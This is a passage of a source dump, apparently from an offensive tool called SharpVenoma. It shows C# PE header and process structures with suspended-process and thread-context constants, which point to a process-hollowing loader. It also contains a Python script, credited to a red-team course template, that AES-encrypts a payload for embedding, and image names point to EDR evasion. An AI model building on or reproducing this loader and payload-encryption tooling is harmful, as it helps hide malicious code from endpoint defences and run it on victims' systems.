623 | public byte MajorLinkerVersion;
624 |
625 | [FieldOffset(3)]
626 | public byte MinorLinkerVersion;
627 |
628 | [FieldOffset(4)]
629 | public uint SizeOfCode;
630 |
631 | [FieldOffset(8)]
632 | public uint SizeOfInitializedData;
633 |
634 | [FieldOffset(12)]
635 | public uint SizeOfUninitializedData;
636 |
637 | [FieldOffset(16)]
638 | public uint AddressOfEntryPoint;
639 |
640 | [FieldOffset(20)]
641 | public uint BaseOfCode;
642 |
643 | [FieldOffset(24)]
644 | public ulong ImageBase;
645 |
646 | [FieldOffset(32)]
647 | public uint SectionAlignment;
648 |
649 | [FieldOffset(36)]
650 | public uint FileAlignment;
651 |
652 | [FieldOffset(40)]
653 | public ushort MajorOperatingSystemVersion;
654 |
655 | [FieldOffset(42)]
656 | public ushort MinorOperatingSystemVersion;
657 |
658 | [FieldOffset(44)]
659 | public ushort MajorImageVersion;
660 |
661 | [FieldOffset(46)]
662 | public ushort MinorImageVersion;
663 |
664 | [FieldOffset(48)]
665 | public ushort MajorSubsystemVersion;
666 |
667 | [FieldOffset(50)]
668 | public ushort MinorSubsystemVersion;
669 |
670 | [FieldOffset(52)]
671 | public uint Win32VersionValue;
672 |
673 | [FieldOffset(56)]
674 | public uint SizeOfImage;
675 |
676 | [FieldOffset(60)]
677 | public uint SizeOfHeaders;
678 |
679 | [FieldOffset(64)]
680 | public uint CheckSum;
681 |
682 | [FieldOffset(68)]
683 | public ushort Subsystem;
684 |
685 | [FieldOffset(70)]
686 | public ushort DllCharacteristics;
687 |
688 | [FieldOffset(72)]
689 | public ulong SizeOfStackReserve;
690 |
691 | [FieldOffset(80)]
692 | public ulong SizeOfStackCommit;
693 |
694 | [FieldOffset(88)]
695 | public ulong SizeOfHeapReserve;
696 |
697 | [FieldOffset(96)]
698 | public ulong SizeOfHeapCommit;
699 |
700 | [FieldOffset(104)]
701 | public uint LoaderFlags;
702 |
703 | [FieldOffset(108)]
704 | public uint NumberOfRvaAndSizes;
705 |
706 | [FieldOffset(112)]
707 | public IMAGE_DATA_DIRECTORY ExportTable;
708 |
709 | [FieldOffset(120)]
710 | public IMAGE_DATA_DIRECTORY ImportTable;
711 |
712 | [FieldOffset(128)]
713 | public IMAGE_DATA_DIRECTORY ResourceTable;
714 |
715 | [FieldOffset(136)]
716 | public IMAGE_DATA_DIRECTORY ExceptionTable;
717 |
718 | [FieldOffset(144)]
719 | public IMAGE_DATA_DIRECTORY CertificateTable;
720 |
721 | [FieldOffset(152)]
722 | public IMAGE_DATA_DIRECTORY BaseRelocationTable;
723 |
724 | [FieldOffset(160)]
725 | public IMAGE_DATA_DIRECTORY Debug;
726 |
727 | [FieldOffset(168)]
728 | public IMAGE_DATA_DIRECTORY Architecture;
729 |
730 | [FieldOffset(176)]
731 | public IMAGE_DATA_DIRECTORY GlobalPtr;
732 |
733 | [FieldOffset(184)]
734 | public IMAGE_DATA_DIRECTORY TLSTable;
735 |
736 | [FieldOffset(192)]
737 | public IMAGE_DATA_DIRECTORY LoadConfigTable;
738 |
739 | [FieldOffset(200)]
740 | public IMAGE_DATA_DIRECTORY BoundImport;
741 |
742 | [FieldOffset(208)]
743 | public IMAGE_DATA_DIRECTORY IAT;
744 |
745 | [FieldOffset(216)]
746 | public IMAGE_DATA_DIRECTORY DelayImportDescriptor;
747 |
748 | [FieldOffset(224)]
749 | public IMAGE_DATA_DIRECTORY CLRRuntimeHeader;
750 |
751 | [FieldOffset(232)]
752 | public IMAGE_DATA_DIRECTORY Reserved;
753 | }
754 |
755 |
756 | [StructLayout(LayoutKind.Explicit)]
757 | public struct IMAGE_NT_HEADERS64{
758 | [FieldOffset(0)]
759 | public UInt32 Signature;
760 | [FieldOffset(4)]
761 | public IMAGE_FILE_HEADER FileHeader;
762 | [FieldOffset(24)]
763 | public IMAGE_OPTIONAL_HEADER64 OptionalHeader;
764 | private string _Signature{
765 | get{
766 | byte[] b = BitConverter.GetBytes(Signature);
767 | return System.Text.Encoding.ASCII.GetString(b);
768 | }
769 | }
770 | public bool isValid{
771 | get { return _Signature == "PE\0\0" && OptionalHeader.Magic == 0x20b; }
772 | }
773 | }
774 |
775 |
776 | [Flags]
777 | public enum DataSectionFlags : uint
778 | {
779 | ///
780 | /// Reserved for future use.
781 | ///
782 | TypeReg = 0x00000000,
783 | ///
784 | /// Reserved for future use.
785 | ///
786 | TypeDsect = 0x00000001,
787 | ///
788 | /// Reserved for future use.
789 | ///
790 | TypeNoLoad = 0x00000002,
791 | ///
792 | /// Reserved for future use.
793 | ///
794 | TypeGroup = 0x00000004,
795 | ///
796 | /// The section should not be padded to the next boundary. This flag is obsolete and is replaced by IMAGE_SCN_ALIGN_1BYTES. This is valid only for object files.
797 | ///
798 | TypeNoPadded = 0x00000008,
799 | ///
800 | /// Reserved for future use.
801 | ///
802 | TypeCopy = 0x00000010,
803 | ///
804 | /// The section contains executable code.
805 | ///
806 | ContentCode = 0x00000020,
807 | ///
808 | /// The section contains initialized data.
809 | ///
810 | ContentInitializedData = 0x00000040,
811 | ///
812 | /// The section contains uninitialized data.
813 | ///
814 | ContentUninitializedData = 0x00000080,
815 | ///
816 | /// Reserved for future use.
817 | ///
818 | LinkOther = 0x00000100,
819 | ///
820 | /// The section contains comments or other information. The .drectve section has this type. This is valid for object files only.
821 | ///
822 | LinkInfo = 0x00000200,
823 | ///
824 | /// Reserved for future use.
825 | ///
826 | TypeOver = 0x00000400,
827 | ///
828 | /// The section will not become part of the image. This is valid only for object files.
829 | ///
830 | LinkRemove = 0x00000800,
831 | ///
832 | /// The section contains COMDAT data. For more information, see section 5.5.6, COMDAT Sections (Object Only). This is valid only for object files.
833 | ///
834 | LinkComDat = 0x00001000,
835 | ///
836 | /// Reset speculative exceptions handling bits in the TLB entries for this section.
837 | ///
838 | NoDeferSpecExceptions = 0x00004000,
839 | ///
840 | /// The section contains data referenced through the global pointer (GP).
841 | ///
842 | RelativeGP = 0x00008000,
843 | ///
844 | /// Reserved for future use.
845 | ///
846 | MemPurgeable = 0x00020000,
847 | ///
848 | /// Reserved for future use.
849 | ///
850 | Memory16Bit = 0x00020000,
851 | ///
852 | /// Reserved for future use.
853 | ///
854 | MemoryLocked = 0x00040000,
855 | ///
856 | /// Reserved for future use.
857 | ///
858 | MemoryPreload = 0x00080000,
859 | ///
860 | /// Align data on a 1-byte boundary. Valid only for object files.
861 | ///
862 | Align1Bytes = 0x00100000,
863 | ///
864 | /// Align data on a 2-byte boundary. Valid only for object files.
865 | ///
866 | Align2Bytes = 0x00200000,
867 | ///
868 | /// Align data on a 4-byte boundary. Valid only for object files.
869 | ///
870 | Align4Bytes = 0x00300000,
871 | ///
872 | /// Align data on an 8-byte boundary. Valid only for object files.
873 | ///
874 | Align8Bytes = 0x00400000,
875 | ///
876 | /// Align data on a 16-byte boundary. Valid only for object files.
877 | ///
878 | Align16Bytes = 0x00500000,
879 | ///
880 | /// Align data on a 32-byte boundary. Valid only for object files.
881 | ///
882 | Align32Bytes = 0x00600000,
883 | ///
884 | /// Align data on a 64-byte boundary. Valid only for object files.
885 | ///
886 | Align64Bytes = 0x00700000,
887 | ///
888 | /// Align data on a 128-byte boundary. Valid only for object files.
889 | ///
890 | Align128Bytes = 0x00800000,
891 | ///
892 | /// Align data on a 256-byte boundary. Valid only for object files.
893 | ///
894 | Align256Bytes = 0x00900000,
895 | ///
896 | /// Align data on a 512-byte boundary. Valid only for object files.
897 | ///
898 | Align512Bytes = 0x00A00000,
899 | ///
900 | /// Align data on a 1024-byte boundary. Valid only for object files.
901 | ///
902 | Align1024Bytes = 0x00B00000,
903 | ///
904 | /// Align data on a 2048-byte boundary. Valid only for object files.
905 | ///
906 | Align2048Bytes = 0x00C00000,
907 | ///
908 | /// Align data on a 4096-byte boundary. Valid only for object files.
909 | ///
910 | Align4096Bytes = 0x00D00000,
911 | ///
912 | /// Align data on an 8192-byte boundary. Valid only for object files.
913 | ///
914 | Align8192Bytes = 0x00E00000,
915 | ///
916 | /// The section contains extended relocations.
917 | ///
918 | LinkExtendedRelocationOverflow = 0x01000000,
919 | ///
920 | /// The section can be discarded as needed.
921 | ///
922 | MemoryDiscardable = 0x02000000,
923 | ///
924 | /// The section cannot be cached.
925 | ///
926 | MemoryNotCached = 0x04000000,
927 | ///
928 | /// The section is not pageable.
929 | ///
930 | MemoryNotPaged = 0x08000000,
931 | ///
932 | /// The section can be shared in memory.
933 | ///
934 | MemoryShared = 0x10000000,
935 | ///
936 | /// The section can be executed as code.
937 | ///
938 | MemoryExecute = 0x20000000,
939 | ///
940 | /// The section can be read.
941 | ///
942 | MemoryRead = 0x40000000,
943 | ///
944 | /// The section can be written to.
945 | ///
946 | MemoryWrite = 0x80000000
947 | }
948 |
949 |
950 | [StructLayout(LayoutKind.Explicit)]
951 | public struct IMAGE_SECTION_HEADER
952 | {
953 | [FieldOffset(0)]
954 | [MarshalAs(UnmanagedType.ByValArray, SizeConst = 8)]
955 | public char[] Name;
956 |
957 | [FieldOffset(8)]
958 | public UInt32 VirtualSize;
959 |
960 | [FieldOffset(12)]
961 | public UInt32 VirtualAddress;
962 |
963 | [FieldOffset(16)]
964 | public UInt32 SizeOfRawData;
965 |
966 | [FieldOffset(20)]
967 | public UInt32 PointerToRawData;
968 |
969 | [FieldOffset(24)]
970 | public UInt32 PointerToRelocations;
971 |
972 | [FieldOffset(28)]
973 | public UInt32 PointerToLinenumbers;
974 |
975 | [FieldOffset(32)]
976 | public UInt16 NumberOfRelocations;
977 |
978 | [FieldOffset(34)]
979 | public UInt16 NumberOfLinenumbers;
980 |
981 | [FieldOffset(36)]
982 | public DataSectionFlags Characteristics;
983 | public string Section{
984 | get { return new string(Name); }
985 | }
986 | }
987 |
988 |
989 | public struct STARTUPINFO
990 | {
991 | public Int32 cb;
992 | public string lpReserved;
993 | public string lpDesktop;
994 | public string lpTitle;
995 | public Int32 dwX;
996 | public Int32 dwY;
997 | public Int32 dwXSize;
998 | public Int32 dwYSize;
999 | public Int32 dwXCountChars;
1000 | public Int32 dwYCountChars;
1001 | public Int32 dwFillAttribute;
1002 | public Int32 dwFlags;
1003 | public Int16 wShowWindow;
1004 | public Int16 cbReserved2;
1005 | public IntPtr lpReserved2;
1006 | public IntPtr hStdInput;
1007 | public IntPtr hStdOutput;
1008 | public IntPtr hStdError;
1009 | }
1010 |
1011 |
1012 | [StructLayout(LayoutKind.Sequential)]
1013 | public struct PROCESS_INFORMATION
1014 | {
1015 | public IntPtr hProcess;
1016 | public IntPtr hThread;
1017 | public int dwProcessId;
1018 | public int dwThreadId;
1019 | }
1020 |
1021 |
1022 | public static class CreationFlags
1023 | {
1024 | public const uint SUSPENDED = 0x4;
1025 | }
1026 |
1027 |
1028 | public enum ThreadAccess : int
1029 | {
1030 | SET_CONTEXT = 0x0010
1031 | }
1032 |
1033 | public static readonly UInt32 MEM_COMMIT = 0x1000;
1034 | public static readonly UInt32 MEM_RESERVE = 0x2000;
1035 | public static readonly UInt32 PAGE_EXECUTE_READ = 0x20;
1036 | public static readonly UInt32 PAGE_READWRITE = 0x04;
1037 |
1038 | }
1039 | }
1040 |
--------------------------------------------------------------------------------
/aes.py:
--------------------------------------------------------------------------------
1 | # Red Team Operator course code template
2 | # payload encryption with AES
3 | #
4 | # author: reenz0h (twitter: @SEKTOR7net)
5 |
6 | import sys
7 | from base64 import b64encode
8 | from Crypto.Cipher import AES
9 | from Crypto.Util.Padding import pad
10 | from Crypto.Random import get_random_bytes
11 | import hashlib
12 |
13 | KEY = get_random_bytes(16)
14 | iv = 16 * b'\x00'
15 | cipher = AES.new(hashlib.sha256(KEY).digest(), AES.MODE_CBC, iv)
16 |
17 | try:
18 | plaintext = open(sys.argv[1], "rb").read()
19 | except:
20 | print("File argument needed! %s " % sys.argv[0])
21 | sys.exit()
22 |
23 | ciphertext = cipher.encrypt(pad(plaintext, AES.block_size))
24 |
25 | # Encode the key and ciphertext with base64 for easy handling in C#
26 | encoded_key = b64encode(KEY).decode('utf-8')
27 | encoded_cipher = b64encode(ciphertext).decode('utf-8')
28 |
29 | # Print the encoded key and ciphertext
30 | print("Base64 Encoded Key:", encoded_key)
31 | print("Base64 Encoded Ciphertext:", encoded_cipher)
--------------------------------------------------------------------------------
/assets/edr1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ProcessusT/SharpVenoma/0adfcdbdb44d1c4bee88d7c222ea0d3935d47a5b/assets/edr1.png
--------------------------------------------------------------------------------
/assets/edr2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ProcessusT/SharpVenoma/0adfcdbdb44d1c4bee88d7c222ea0d3935d47a5b/assets/edr2.png
--------------------------------------------------------------------------------
/assets/payload_encode.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ProcessusT/SharpVenoma/0adfcdbdb44d1c4bee88d7c222ea0d3935d47a5b/assets/payload_encode.png
--------------------------------------------------------------------------------
/assets/payload_update.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ProcessusT/SharpVenoma/0adfcdbdb44d1c4bee88d7c222ea0d3935d47a5b/assets/payload_update.png
--------------------------------------------------------------------------------